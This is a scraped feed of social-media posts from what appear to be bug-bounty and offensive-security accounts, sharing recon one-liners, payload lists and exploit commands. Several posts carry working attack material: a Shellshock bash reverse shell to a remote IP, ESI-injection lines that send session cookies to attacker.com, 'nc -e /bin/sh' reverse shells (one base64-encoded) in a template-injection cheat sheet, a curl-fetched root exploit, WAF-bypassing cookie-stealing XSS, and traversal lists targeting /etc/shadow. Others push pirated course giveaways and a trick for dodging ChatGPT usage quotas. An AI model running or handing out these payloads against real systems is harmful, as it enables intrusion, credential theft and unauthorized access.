"Oneliner XSS at scale cat domainlist.txt subfinder dnsx waybackurl egrep -iv ".(jpgjpeggifcsstiftiffpngttfwoffwoff2icopdfsvgtxtjs)" uro dalfox pipe -b -o xss.txt -- Happy hunting #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished"
X Link 2023-12-23T07:21Z 22.3K followers, [----] engagements
"Fetch known URLs from AlienVault's Open Threat Exchange the Wayback Machine and Common Crawl"
X Link 2023-12-23T09:20Z 13.6K followers, 11.9K engagements
"New JavaScript malware alert: It's stealing online banking credentials. Affected: Over 50000+ users across: - North America - South America - Europe - Japan Under Attack: Over [--] global financial institutions. Details here:"
X Link 2023-12-24T03:59Z 19.4K followers, [----] engagements
"Breaking News: FBI hacks the hackers. U.S. Justice Department disrupts the BlackCat ransomware operation, the second most prolific RaaS variant, and releases a FREE decryption tool, saving victims from $68 million in ransom demands. Details:"
X Link 2023-12-24T04:00Z 22.3K followers, [----] engagements
"Merry Christmas for everyone Learn Ethical Hacking From Scratch 100% Free For First [----] Users. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost with everyone please [--]. Comment Send to receive your link "I do not own this content. For any issues or concerns please contact the rightful owner directly." Share this post to spread the word #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips @SaveToNotion"
X Link 2023-12-24T04:19Z 20.1K followers, 51.5K engagements
"CVE-2022-1040 - RCE in Sophos Firewall curl -sk -H "X-Requested-With: XMLHttpRequest" -X POST 'hxxps://x.x.x.x/userportal/Controllermode=8700&operation=1&datagrid=179&json="x":"test"' grep -q 'Session Expired' #CVE #RCE"
X Link 2023-12-25T07:47Z 24K followers, 23.8K engagements
"If you're on an engagement and you discover some /cgi-bin/ directory - it would be wise to fuzz for file names + ".cgi". Checking for CGI files either left behind from a default configuration or perhaps a developer who was utilizing it for debugging purposes is an important thing to check for. Lets suppose you found something like /cgi-bin/superadmin.cgi during your engagement. The first thing that should come to your mind is "I wonder if it's shellshock vulnerable". nc -nlvp [----] export CMD="bash -i & /dev/tcp/192.168.1.6/9997 0&1" curl -H "User-Agent: () :; ; /bin/bash -c 'echo aaaa; $CMD;"
X Link 2023-12-26T22:28Z [--] followers, [----] engagements
"CVE-2023-50254: Critical RCE in Deepin Linux Desktop OS's default document reader"
X Link 2023-12-28T07:21Z [--] followers, [----] engagements
"KING HACKING TOOL Commands : git clone cd King-Hacking bash"
X Link 2023-12-28T12:41Z [--] followers, 27.3K engagements
"Bug Bounty Tips # Exposed Source Code ## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys which may help malicious users formulate attacks against the application. ## Where to find - ## How to exploit [--]. Exposed Git folder GIT Tools to dump .git * [--]. Exposed Subversion folder SVN Tools to dump .svn * [--]. Exposed Mercurial folder HG Tools to dump .hg * [--]. Exposed Bazaar folder BZR Tools to dump .bzr * [--]. Exposed Darcs folder Tools to dump"
X Link 2023-12-29T22:05Z 22.3K followers, [----] engagements
"8000+ XSS Payloads github : #bugbounty #Infosec #xss https://github.com/radhasec/xss_payload"
X Link 2024-01-06T09:02Z 25.1K followers, 20.7K engagements
"Learn SQLi Query Fixing [--]. identify sqli vulnerability ' " [--]. balance the query http://192.168.1.103/sqli-labs-master/Less-1/id=1 front end select id ='id' where name ='xyz' background how to fix http://192.168.1.103/sqli-labs-master/Less-1/id=1' -- select id ='1' -- ' where name ='xyz' background Less-2 in background select id=1 -- where name =xyz how to fix query http://192.168.1.103/sqli-labs-master/Less-2/id=1 -- Less-3 in background select id = ('1') where name =('xyz') -------------------------------------------- SQLI Through Get Based Less-1"
X Link 2024-01-07T21:51Z 22.3K followers, 12.1K engagements
"Bounty Tips Collected From Twitter"
X Link 2024-01-08T14:40Z 22.3K followers, [----] engagements
"Tips to ur tests n hunts: #SQLi Polyglot* - test every ways encodes (hex url b64 and others ciphers). Look this suggestions: &1/'/"//1# or and-1/'/"//1-- #CyberSecurity #pentest #bugbounty #php #python #mariadb"
X Link 2024-01-09T05:05Z 22.3K followers, [----] engagements
"Stored XSS via cache poisoning the Akamai WAF really annoyed me but the craft of this payload defeated it : "a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames'ale'+'rt')(Reflect.get(document'coo'+'kie'))" Credit: @zhero___ #bugbountytips #BugBounty #Hacking"
X Link 2024-01-10T03:53Z 25K followers, [----] engagements
"Daily Notes : Day [--] ESI Injection - Exploitation XSS - esi:include src=http://domain.com/xss.html COOKIE STEALING - esi:include src=http://attacker.com/$(HTTP_COOKIE) esi:include src="http://attacker.com/cookie=$(HTTP_COOKIE'JSESSIONID')" / AKAMAI DEBUG -esi:debug/ CRLF - esi:include src="http://domain.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/ XXE (ESI + XSLT) - esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" / Credit: @h4x0r_fr34k"
X Link 2024-01-11T21:05Z 22.3K followers, [---] engagements
"-150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: -151-enum4linux Cheat Sheet: -152-enumeration: -153-Command and Control WebSocket: -154-Command and Control WMI: -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: -156-Comprehensive Guide to Nmap Port Status: -157-Commix Automated All-in-One OS Command Injection and Exploitation Tool: -158-Compromising Jenkins and extracting credentials: -159-footprinting: -160-awesome-industrial-control-system-security: -161-xss-payload-list: -162-awesome-vehicle-security: -163-awesome-osint: -164-awesome-python:"
X Link 2024-01-12T03:38Z 15.6K followers, [---] engagements
"-184-Hidden directories and files as a source of sensitive information about web application: -185-Hiding Registry keys with PSReflect: -186-awesome-cve-poc: -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: -188-Post Exploitation in Windows using dir Command: -189-Web Application Firewall (WAF) Evasion Techniques #2: -190-Forensics Investigation of Remote PC (Part 1): -191-CloudFront Hijacking: -192-PowerPoint and Custom Actions: -193-Privilege Escalation on Windows [----] Server [----] Server [----] using Potato: -194-How to intercept TOR hidden service"
X Link 2024-01-12T03:38Z 13.6K followers, [---] engagements
"-342-Security Harden CentOS [--] : -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: -344-MySQL: -345-Deobfuscation of VM based software protection: -346-Online Assembler and Disassembler: -347-Shellcodes database for study cases: -348-Dynamic Binary Analysis and Obfuscated Codes: -349-How Triton may help to analyse obfuscated binaries: -350-Triton: A Concolic Execution Framework: -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: -352-What kind of semantics information Triton can provide: -353-Code coverage using a dynamic symbolic execution:"
X Link 2024-01-12T03:40Z 22.3K followers, [---] engagements
"-375-The Complete List of Windows Post-Exploitation Commands (No Powershell): -376-The Art of Subdomain Enumeration: -377-The Principles of a Subdomain Takeover: -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise: -379-The Solution for Web for Pentester-I: -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: -381-: Ethical Hacking Hack Tools Hacking Tricks Information Gathering Penetration Testing Recommended: -383-Introduction to Exploitation Part 1: Introducing Concepts and Terminology: -384-How Hackers Kick Victims Off of Wireless"
X Link 2024-01-12T03:41Z 16.6K followers, [---] engagements
"Daily Notes : Day [--] ESI Injection - Exploitation XSS - esi:include src=http://domain.com/xss.html COOKIE STEALING - esi:include src=http://attacker.com/$(HTTP_COOKIE) esi:include src="http://attacker.com/cookie=$(HTTP_COOKIE'JSESSIONID')" / AKAMAI DEBUG -esi:debug/ CRLF - esi:include src="http://domain.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/ XXE (ESI + XSLT) - esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" / Credit: @h4x0r_fr34k"
X Link 2024-01-12T04:45Z 22.7K followers, [----] engagements
"USE CHAT GPT-4 FOR FREE - EXTENSION FOR KIWI BROWSER ON PHONE (USE DESKTOP MODE) AND FOR PC BROWSERS BASED ON CHROMIUM LINK : - EXTENSION FOR FIREFOX BROWSER MOBILE (DESKTOP MODE) AND PC FIREFOX BROWSER LINK : - EXTENSION OFFICIAL WEBSITE: STEPS : [--]. MAKE ACCOUNT AFTER INSTALLATION OF EXTENSION [--]. USE USING POPUP SIDE ICON ON PAGE [--]. OF ACCOUNT GPT-4 QUOTA EXPIRES THEN MAKE NEW ACCOUNT AND USE AGAIN AS MUCH AS YOU WANT BY @Mr_Neophyte Share with Your Mate"
X Link 2024-01-15T02:01Z 22.3K followers, [----] engagements
"CVE-2023-7028 Account-Take-Over Gitlab Repo: https://github.com/Vozec/CVE-2023-7028"
X Link 2024-01-15T04:37Z 24K followers, [----] engagements
"Here's [--] tools you can use to effectively find sensitive information in JS files: [--]. Hakrawler Extracting JavaScript files. Link : [--]. LinkFinder Finding Endpoints in JS files. Link : [--]. jsluice Extract URLs paths secrets and other interesting data from JavaScript source code. Link : Do you use anything else? Let us know in the comments #BugBounty #recon Credit:@hakluke"
X Link 2024-01-16T02:51Z 22.3K followers, 16.3K engagements
"Scripting for Hackers Learn to write scripts in BASH Perl and Python for cyber warriors"
X Link 2024-01-21T15:47Z 22.3K followers, 16.8K engagements
"Stored XSS via cache poisoning the Akamai WAF really annoyed me but the craft of this payload defeated it : "a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames'ale'+'rt')(Reflect.get(document'coo'+'kie'))" #bugbountytips #BugBounty #Hacking Credit: @zhero___"
X Link 2024-01-26T07:03Z 22.7K followers, [----] engagements
""img src=x onerrora=confirm() onerror=confirm() Cloudflare WAF bypass to XSS that someone discovered a few years ago. It still works on most sites including the official Cloudflare site. Credit: Ignacio Laurence #infosec #hacking #hacker #cybersecurity #bugbountytips"
X Link 2024-01-26T18:14Z 22.4K followers, [---] engagements
"Bob the Smuggler" is a tool that leverages HTML Smuggling Attack and allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots). The JavaScript embedded within the HTML will download the PNG/GIF file and store it in the cache. Following this the JavaScript will extract the data embedded in the PNG/GIF assemble it perform XOR decryption and then store it as an in-memory blob. Repo:"
X Link 2024-01-28T08:19Z 22.4K followers, [----] engagements
"Finally Found the Ultimate Pentesting Toolkits #Day1 As a security professional I'm always on the hunt for the best tools to stay ahead of the curve. After spending countless hours searching for a comprehensive list I stumbled upon three goldmines that I now use all the time: Pentesting Tools Database by Christian Scott and Travis DeForge: This Notion site is a game-changer. It's meticulously organized covering a vast array of tools for information gathering vulnerability analysis web applications database assessment and even password attacks. Plus many of the tools are open-source making"
X Link 2024-01-31T06:46Z 22.5K followers, 15.9K engagements
"Akamai WAF #XSS #Bypass A %252F=""Href= JavaScript:k='a'topk%2B'lert'(1)"
X Link 2024-01-31T20:28Z 22.4K followers, [----] engagements
"Exciting News I've just conquered the Twister machine in my OSCP journey #Day7 Now I'm sharing my code and notes to help You Check out == Nmap == nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --open nmap -p- --script=vuln $IP ### HTTP-Methods nmap --script http-methods --script-args http-methods.url-path='/website' ### sed IPs: grep -oE '((1 0-9 0-9 20-4 0- [--] 250-5).)3 (1 0-9 0-9 [--] 0-4 0-9 [--] 0-5 ) ' FILE --Script smb-enum-shares == WPScan & SSL == wpscan --url $URL --disable-tls-checks --enumerate p --enumerate"
X Link 2024-02-05T07:40Z 24.2K followers, 18.6K engagements
"DISCOVERING DOMAIN #DAY11 Look for Asn AMASS sudo amass enum -brute -d www.targett.mil -o target.txt -p [-----------------] sudo amass enum -active -brute -d www.targett.mil -o -p [-----------------] amass enum -v -src -ip -brute -min-for-recursive [--] -d ----------------------------------------------------------------- *amass asn amass intel -org TARGET -v amass intel -asn [------] -o ans.txt -v amass enum -d targett.com -o ubesubdoamin.txt -v hunting - Subdomain Enumeration Subfinder subfinder -d targett.com -o domain.txt subfinder -d targett.com -sources securitytrails *for look how"
X Link 2024-02-14T18:04Z 28.8K followers, 12.6K engagements
"Linux explorer Easy-to-use live forensics toolbox for Linux endpoints. : DaProfiler DaProfiler allows you to get emails social medias addresses works and more on your target using web scraping and google dorking techniques based in France Only. The particularity of this program is its ability to find your target's e-mail addresses.: Collection OSINT resources and tools So what is this all about? Yep it's an OSINT blog and a collection of OSINT resources and tools.: Tools and techniques related with Cloud Osint A repository with information related to different resources tools and techniques"
X Link 2024-02-17T06:58Z 22.7K followers, [----] engagements
"Ghost Recon An OSINT framework updated weekly with which you can search on precise targets with a lot of features like person search criminal search or social media scanning with email/phone and ip changer. : Collector Collector is a tool for osint (open source intelligence). : Twayback Automate downloading archived deleted ets.: Opensquat Detection of phishing domains and domain squatting. Supports permutations such as homograph attack typosquatting and bitsquatting. : Telegram Trilateration Proof of concept for abusing Telegram's "People Near Me" feature and tracking people's location:"
X Link 2024-02-17T06:58Z 22.7K followers, [----] engagements
"Join us for an immersive exploration into live hacking web applications on Discord. Our Hackers community offers a dynamic platform for collaborative learning and knowledge sharing. Feel free to engage by commenting or reaching out via direct message. We plan to showcase intricate hacking sessions for the community. We're eager to embark on this hacking journey with you. Access the free live event here: Discord Channel: Looking forward to hacking alongside you. Greetings, I'm hosting a live event on my Discord channel. Would you be interested in joining us? We'll be showcasing live hacking"
X Link 2024-02-21T06:49Z 22.7K followers, [----] engagements
"Shodan-Dork - Product mysql found: product:MySQL - MongoDB: "MongoDB Server Information" -authentication - default password: "default password" - guest login: guest login ok - Jenkins Unrestricted Dashboard: x-jenkins [---] - wp config: http.html:"* The wp-config.php creation script uses this file" - root session: "root@" port:23 -login -password -name -Session - default wireless password: html:"def_wirelesspassword" - Auth disabled: "authentication disabled" - dashboard: http.title:"dashboard" - control panel: http.title:"control panel" - phpmyadmin"
X Link 2024-03-25T07:26Z 22.7K followers, [--] engagements
"#Recon automation for #bughunters 1- Subdomain discovery with Subfinder: subfinder -dL targets.txt -all -recursive -o facebook.txt cat facebook.txt wc -l 2- Discover subdomains via curl -s jq -r '..name_value' grep -Po '(w+.w+.w+)$' anew subdomains-faceboo.txt cat subdomains-faceboo.txt wc -l 3- Check live subdomains with HTTPX: cat subdomains-faceboo.txt httpx -l subdomains-faceboo.txt -ports [-----------------] -threads [---] subdomains-faceboo-alive.txt cat subdomains-faceboo-alive.txt wc -l 4- Port scanning with Naabu: naabu -list subdomains-faceboo.txt -c [--] -nmap-cli 'nmap -sV -sC' -o"
X Link 2024-04-02T08:20Z 22.7K followers, [----] engagements
""Exploit Alert: CVE-2024-1086 (Local Privilege Escalation) Amidst the chaos of the xz backdoor this exploit stealthily emerged. Works on Linux kernels [----] to v6.6. Repo: Creator: @notselwyn #Cybersecurity #Linux #Vulnerability" http://github.com/Notselwyn/CVE-2024-1086"
X Link 2024-04-06T18:02Z 23.4K followers, [----] engagements
"Happy Hunting Explore the fascinating world of directory traversal [--]. ./ [--]. . [--]. ./ [--]. %2e%2e%2f [--]. %252e%252e%252f [--]. %c0%ae%c0%ae%c0%af [--]. %uff0e%uff0e%u2215 [--]. %uff0e%uff0e%u2216 [--]. . = %u002e [--]. / = %u2215 [--]. = %u2216 [--]. . = %c0%2e %e0%40%ae %c0ae [--]. / = %c0%af %e0%80%af %c0%2f [--]. = %c0%5c %c0%80%5c [--]. ././ [--]. .. [--]. .;/ [--]. .;/.;/sensitive.txt [--]. . = %252e [--]. / = %252f [--]. = %255c [--]. file:///etc/passwd [--]. http://127.0.0.1:8080 [--]. /etc/issue [--]. /etc/passwd [--]. /etc/shadow [--]. /etc/group [--]. /etc/hosts [--]. /etc/motd [--]. /etc/mysql/my.cnf [--]. /proc/0-9*/fd/0-9* (first"
X Link 2024-04-08T05:50Z 24.4K followers, [--] engagements
"OTP Bypass Techniques [--]. Status Code Manipulation If Status Code is 4xx Try to change it to [---] OK and see if it bypasses restrictions [--]. Try to send Empty OTP or Set NULL in the field of OTP that is otp=null to bypass POST /secondLogin HTTP/1.1 Host: Content-Type: application/json Content-Length: Number "email":"me""pass":"""otp":"" Reference [--]. Try to insert Zeros in the OTP Parameter that is [------] to bypass OTP POST /secondLogin HTTP/1.1 Host: Origin: Content-Length: Number "email":"me""pass":"""otp":"000000" [--]. If the request is in JSON Request an OTP"
X Link 2024-04-09T10:16Z 23.1K followers, 11K engagements
"@galnagli What are you talking about if you have [---] vdp @galnagli"
X Link 2024-04-17T05:26Z 23.4K followers, [----] engagements
"@PikuHaku @GodfatherOrwa @bxmbn every single program is vdp . Bring more excuses @PikuHaku like you say some program pay In the end they are VDP"
X Link 2024-04-18T08:50Z 23.4K followers, [---] engagements
"Discover a wealth of learning materials in one place [--]. Data Science [--]. Python [--]. Artificial Intelligence [--]. Big Data [--]. Data Analytics [--]. Google Cloud Platform [--]. IT Training [--]. MBA [--]. Cybersecurity Simply: [--]. Follow @TheMsterDoctor1 (So I Will Dm) [--]. Like and Repost [--]. Send me a private message Send to receive your link "I do not own this content. For any issues or concerns please contact the rightful owner directly." Share this post to spread the word #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware"
X Link 2024-05-12T03:43Z 23.9K followers, [----] engagements
"Discover a wealth of learning materials in one place This link contains Tutorials + Books + Courses + Trainings + Educational Resources in: [--]. Data Science [--]. Python [--]. Artificial Intelligence [--]. Big Data [--]. Data Analytics [--]. Google Cloud Platform [--]. IT Training [--]. MBA [--]. Cybersecurity And much more Link: Simply: [--]. Follow @TheMsterDoctor1 [--]. Like and Repost "I do not own this content. For any issues or concerns please contact the rightful owner directly." Share this post to spread the word #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking"
X Link 2024-05-12T20:27Z 23.9K followers, [----] engagements
"500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources - Data science - Python - Artificial Intelligence - AWS Certified - Cloud - BIG DATA - Data Analytics - BI - Google Cloud Platform - IT Training - MBA - Machine Learning - Deep Learning - Ethical Hacking - SPSS - Statistics - Data Base - Learning language resources ( English French German ) And more 100% Free For First [----] Users. Simply: [--]. Follow @TheMsterDoctor1 (So I Will Dm) [--]. Like and Repost [--]. Send me a private message Send to receive your link "I do not own this content. For any issues"
X Link 2024-05-18T02:22Z 24.2K followers, 14.7K engagements
"## Advanced Google Dork Cheatsheet ### Search Filters and Descriptions #### Text Searches - allintext - Description: Searches for occurrences of all the keywords within the text of a page. - Example: allintext:"network security vulnerabilities" - intext - Description: Searches for the occurrences of any of the keywords within the text of a page. - Example: intext:"password" "login" #### URL Searches - inurl - Description: Searches for a URL containing one of the keywords. - Example: inurl:"admin" - allinurl - Description: Searches for a URL"
X Link 2024-08-03T04:41Z 25K followers, [----] engagements
"Google Dork Hunt for XSS SQLi API vulnerabilities & hidden endpoints python dork.py -d "site:*target filetype:php" #bugbountytips #bugbounty https://github.com/schooldropout1337/dork"
X Link 2024-09-22T06:16Z 25K followers, 12.1K engagements
"Offensive Security Tool: XSSRocket XSSRocket is developed by Chris Abou-Chabk from Black Hat Ethical Hacking and it's a tool designed for Offensive Security and XSS (Cross-Site-Scripting) attacks. The tool tracks response codes marking success and failure and creates a detailed report of the findings saving them in a folder named after the domain. Some key features: - It supports Stealth Mode using Proxychains for more reliable attacks against defensive mechanisms. - It uses httpx to filter only active URLs and clear the values for each parameter. - It uses a remote XSS payload list from GitHub."
X Link 2024-10-11T21:43Z 24.7K followers, [----] engagements
"Is Your Sensitive Data at Risk on GitHub? Learn About GitHub Dorking. In the world of cybersecurity GitHub Dorking has become a powerful technique used by both ethical hackers and cybercriminals to uncover sensitive information left exposed in public repositories. API keys passwords and tokens are often inadvertently shared putting organizations at serious risk of data breaches. What Is GitHub Dorking? GitHub Dorking involves using specific search queries to find secrets hidden within public repositories allowing attackers to access confidential information. The good news With the"
X Link 2024-10-16T22:48Z 25K followers, [---] engagements
"Subdomain Enumeration - Favicon Search This Python tool calculates the hash of a given image (a favicon file or url) and then performs a search on Shodan to find webapps that use the same favicon. This is very useful to find subdomains during the recon process. Install git clone cd favicon-hashtrick pip3 install -r requirements.txt Usage $ python3 -f favicon_file $ python3 -k xxxxxxxxxxxxxxxxxxxxx -v ip_strhostnames -u favicon_url Github: Link #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools http://favicon-hashtrick.py"
X Link 2025-01-04T19:48Z 25.2K followers, [----] engagements
"## Some Shodan Dorks that might be useful in Bug Bounty. [--]. org:"http://target. com" [--]. http.status:"status_code" [--]. product:"Product_Name" [--]. port:Port_Number Service_Message [--]. port:Port_Number Service_Name [--]. http.component:"Component_Name" [--]. http.component_category:"Component_Category [--]. http.waf:"firewall_name" [--]. http.html:"Name" [--]. http.title:"Title_Name" [--]. ssl.alpn:"Protocol" [--]. http.favicon.hash:"Favicon_Hash" [--]. net:"Net_Range" (for e.g. 104.16.100.52/32) [--]. .com" [--]. asn:"ASnumber" [--]. hostname:"hostname" [--]. ip:"IP_Address" [--]. all:"Keyword" [--]. Set-Cookie: phpMyAdmin 20."
X Link 2025-03-23T23:52Z 25.2K followers, [----] engagements
"**The best one liner XSS** subfinder -dL domainlist1.txt dnsx shuf (gau hakrawler) anew egrep -iv ".(jpgjpeggiftiftiffpngttfwoffwoff2phpicopdfsvgtxtjs)$" urless nilo dalfox pipe -b https://xss.hunter/q=1 #bugbountytips #bugbounty #xss"
X Link 2025-03-28T03:26Z 25.8K followers, [----] engagements
"NextSploit: Next.js CVE-2025-29927 Scanner & Exploiter NextSploit is a tool that detects and exploits CVE-2025-29927 a security flaw in Next.js Check it out: CREDIT:@AnonKryptiQuz #CyberSecurity #Pentesting #NextJS #Exploit #CTF #EthicalHacking #RedTeam #infosec https://github.com/AnonKryptiQuz/NextSploit"
X Link 2025-03-28T19:43Z 25.7K followers, 10.3K engagements
"## Special Tools Resolution - (DNS) - (DNS) - (HTTP) Wildcard DNS - - Reconnaissance - (fully-fledged recon service) - (DNS and subdomain recon) - Reverse IP (Domainmonitor) - Security (Security Report missing headers) - (WHOIS DNS email and subdomain recon) - (wide range of DNS-related recon tools) - (Source Code Search Engine) - (Find domains in the IP block owned by a Company/Organization) - HackerTarget (DNS recon site lookup and scanning tools) - (WHOIS DNS and subdomain recon) - (SSL certificate search) - Google (SSL certificate transparency search) - PenTest (Google"
X Link 2025-03-29T01:43Z 25.5K followers, [----] engagements
"## Template Injection Ruby ruby %=id% Twig The following payload should output [--]. 7*'7' Jinja This payload should output [-------]. 7*'7' 7-1"'baa nec rmt load file base [--] decode ssh "passthru('nc -e /bin/sh 10.0.2.15 8888');"@66.218.84.43 ssh "passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxMC4wLjIuMTUgODg4OAo==');"@66.218.84.43 # Basic server-side template injection %= 77 % %25%3d+77+%25 %= system("rm /home/carlos/morale.txt") % %25+system("rm+/home/carlos/morale.txt")+%25 rce %3C%=%20system(%22whoami%22)%20%%3E %20system(%22cat%20/etc/passwd%22)%20%%3E # Basic server-side"
X Link 2025-03-29T15:31Z 25.5K followers, [----] engagements
"Advanced Bug Bounty One-Liners 1.Recon Pipeline: Automates subdomain discovery port scanning and vulnerability detection: subfinder -d -all anew subs.txt; shuffledns -d -r resolvers.txt -w wordlist.txt anew subs.txt; dnsx -l subs.txt -r resolvers.txt anew resolved.txt; naabu -l resolved.txt -rate [-----] anew ports.txt; httpx -l ports.txt -silent -title -tech-detect -status-code anew live_hosts.txt; katana -list live_hosts.txt -depth [--] -silent anew urls.txt; nuclei -l urls.txt -severity highcritical -silent anew vulnerabilities.txt 2.JS File Extraction: Extract JavaScript files from live hosts:"
X Link 2025-03-30T19:14Z 25.6K followers, 12.3K engagements
"SubDominator helps you discover subdomains associated with a target domain efficiently and with minimal impact for your Bug Bounty #bugbounty #bugbountytips #bugbountytip https://github.com/RevoltSecurities/Subdominatortab=readme-ov-file"
X Link 2025-03-31T13:01Z 25.6K followers, [----] engagements
"π₯ CVE-2025-0401 - 7350pipe - Linux Privilege Escalation (All Versions) π¨ Critical vuln affects ALL Linux versions π Gain root with a single command: . (curl -fsSL π‘ Exploit breakdown: exploit with curl 2.Execute to gain root access 3.Verify with id -u π Mitigation: Patch ASAP & restrict local access #CyberSecurity #Linux #Exploit #PrivilegeEscalation #CVE2025 http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe http://1.Download http://thc.org/7350pipe"
X Link 2025-04-02T03:53Z 25.8K followers, 24.8K engagements
"Automate Bug Bounty Recon Like a Pro Step 1: Download All Domains from the Latest Update # Create a working directory mkdir bounty_targets && cd bounty_targets # Download the latest domains list wget -O domains.txt Step 2: Filter Main Domains # Extract main domains and save to a file cat domains.txt awk -F '.' 'print $(NF-1)"."$NF' grep -Eo '(a-zA-Z0-9-+.)+a-zA-Z2' sort -u main_domains.txt Step 3: Filter IP Addresses # Extract IP addresses from the domain list grep -Eo 'b(0-913.)30-913b' domains.txt ips.txt Step 4: Automate Updates and Monitoring (Using Cron) You can schedule the script"
X Link 2025-04-06T21:25Z 25.7K followers, [----] engagements
"Ethical Hackers: Here's my FULL blueprint for finding vulnerabilities companies miss: Follow if you want more advanced recon and bug bounty blueprints Thread Content: 1/ Look where nobody else looks: Backup files (.zip .sql .bak) /admin/ /api/ /dev/ folders 2/ Abuse outdated endpoints via Wayback Machine. 3/ Check API docs for forgotten parameters and hidden methods. 4/ Upload fields = your best RCE opportunities. 5/ URL parameter fuzzing still wins (id= redirect_uri= page=). 6/ Look at Content Security Policies to find 3rd party buckets. 7/ Target misconfigurations before 0-days. 8/"
X Link 2025-04-28T22:05Z 25.9K followers, [----] engagements
"SSRF on Steroids (2025 Edition) Find $$$ via blind SSRF using modern tooling + automation Let's cook: Step 1: Subdomain Enumeration Use parallelized passive + active recon for wide coverage: subfinder -dL targets.txt -all -o subs.txt amass enum -passive -df targets.txt -o amass.txt cat subs.txt amass.txt anew all-subs.txt Step 2: Probe for Live Hosts Use HTTPX with full headers status and IP tracking: cat all-subs.txt httpx -status-code -ip -title -json -o all-live.json jq -r '.url' all-live.json all-live.txt Step 3: Extract URLs (filter static assets) cat all-live.txt gauplus -subs -o"
X Link 2025-04-29T12:56Z 25.9K followers, [---] engagements
"How I went from $0 to $20K in bug bounties using only open-source tools You don't need a huge budget. Just strategy precision and the right stack. Here's the full process I used step by step: 1/10 2/10 Subdomain Enumeration I use Amass with a custom config + passive sources + bruteforce. It finds domains most people miss. amass enum -config /.amass/config.ini -brute -df domains.txt Bonus tip: combine with Wayback and Chaos DB. 3/10 Port Discovery I pair Masscan for speed + Nmap for detail. masscan -p1-65535 TARGET --rate=10000 -oX ports.xml nmap -A -p- -iL targets.txt Masscan finds open ports"
X Link 2025-04-29T16:03Z 25.9K followers, [---] engagements
"Advanced SQL Injection Discovery & Exploitation Pipeline Goal: Identify and exploit injectable parameters across a large surface area using automation and precision. [--]. Param Harvesting + Passive Signal Detection echo "http://target/" gau uro grep "" sed "s/=.*/=A'/" uniq params.txt cat params.txt httpx -mr ".SQL..syntax..error." gau pulls archived URLs via Wayback & CommonCrawl. uro deduplicates. httpx sends injection probes and matches on DB error signals (e.g. Unclosed quotation syntax error). This step passively fingerprints potentially injectable parametersno active exploitation"
X Link 2025-04-30T02:04Z 26K followers, [----] engagements
"Advanced Salesforce Help Desk Misconfiguration Hunting Guide [--]. Subdomain & Asset Discovery Use passive and active enumeration to discover potential Salesforce-based help desk instances: # Passive discovery amass enum -d assetfinder --subs-only gau grep -Ei 'salesforceforce.com' # Certificate transparency curl -s jq -r '..name_value' grep -Ei 'salesforcehelpdesk' Target patterns: *.lightning.force.com *.my.salesforce.com [--]. URL & Endpoint Mapping Map common Salesforce community and help desk paths. Focus on: Case detail pages Guest user views Password reset tokens File attachments Known"
X Link 2025-04-30T04:42Z 25.9K followers, [----] engagements
"PART [--] ADVANCED BUG BOUNTY RECON PLAYBOOK Stealth Automation & Finding What Others Miss Most hunters STOP at surface recon. This is where REAL MONEY starts. Here's how to step into the elite 1% (Stealth + Deep + Automated Recon Blueprint) [--] JS Recon Extract Hidden Gems JavaScript holds endpoints keys secrets. Tools: subjs LinkFinder JSParser subjs -i alive.txt -o jsfiles.txt cat jsfiles.txt LinkFinder -i - -o cli endpoints.txt Dump JS; Extract endpoints; Create new attack surface [--] Historical Data Mining Go Back in Time Old endpoints often = Forgotten & vulnerable. Tools: waybackurls"
X Link 2025-05-04T01:27Z 26.4K followers, [----] engagements
"BLACK OPS BUG BOUNTY DOMINATION SYSTEM $50K+ SYSTEM FOR ADVANCED RECON EXPLOIT CHAINS & FULL AUTOMATION (2025+) I built the most ruthless system to hunt 24/7 exploit advanced bugs and destroy lazy hunters. Here's EXACTLY how I print $$$ and how you can too (FULL FREE DROP): STEP [--] Automated Recon Arsenal (Recon Blackbox) Passive Subdomain Recon subfinder (with shuffledns / recursive brute) amass intel passive active puredns bruteforce (with resolvers rotation) HTTP Probing + Fingerprinting httpx (title tech status tls cdn pipeline) nuclei (ALL + custom exploit templates) aquatone"
X Link 2025-05-08T14:10Z 26.2K followers, 12.2K engagements
